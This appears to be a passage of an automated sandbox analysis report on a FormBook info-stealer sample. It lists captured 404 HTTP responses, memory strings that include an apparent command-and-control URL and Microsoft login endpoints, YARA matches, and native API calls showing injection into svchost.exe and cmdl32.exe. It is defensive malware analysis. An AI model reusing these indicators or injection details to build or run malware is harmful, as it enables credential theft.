61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: cmdl32.exe, 00000007.00000002.4614735338.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.0000000003A92000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://github.com/necolas/normalize.css
            Source: cmdl32.exe, 00000007.00000002.4614735338.000000000575A000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?9jtPKX=n8oXMK/zoXm
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4615262258.000000000507F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mondayigboleague.info
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4615262258.000000000507F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mondayigboleague.info/zeyp/
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdl32.exe, 00000007.00000003.2669870043.00000000079BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033o
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C333 NtClose,2_2_0042C333
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,2_2_03872C70
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049035C0 NtCreateMutant,LdrInitializeThunk,7_2_049035C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04904650 NtSuspendThread,LdrInitializeThunk,7_2_04904650
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04904340 NtSetContextThread,LdrInitializeThunk,7_2_04904340
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04902CA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04902C70
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902C60 NtCreateKey,LdrInitializeThunk,7_2_04902C60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902DD0 NtDelayExecution,LdrInitializeThunk,7_2_04902DD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04902DF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04902D10
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04902D30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04902E80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04902EE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902FB0 NtResumeThread,LdrInitializeThunk,7_2_04902FB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902FE0 NtCreateFile,LdrInitializeThunk,7_2_04902FE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902F30 NtCreateSection,LdrInitializeThunk,7_2_04902F30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049039B0 NtGetContextThread,LdrInitializeThunk,7_2_049039B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902AD0 NtReadFile,LdrInitializeThunk,7_2_04902AD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902AF0 NtWriteFile,LdrInitializeThunk,7_2_04902AF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04902BA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04902BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04902BE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902B60 NtClose,LdrInitializeThunk,7_2_04902B60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04903090 NtSetValueKey,7_2_04903090
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04903010 NtOpenDirectoryObject,7_2_04903010
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902CC0 NtQueryVirtualMemory,7_2_04902CC0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902CF0 NtOpenProcess,7_2_04902CF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902C00 NtQueryInformationProcess,7_2_04902C00
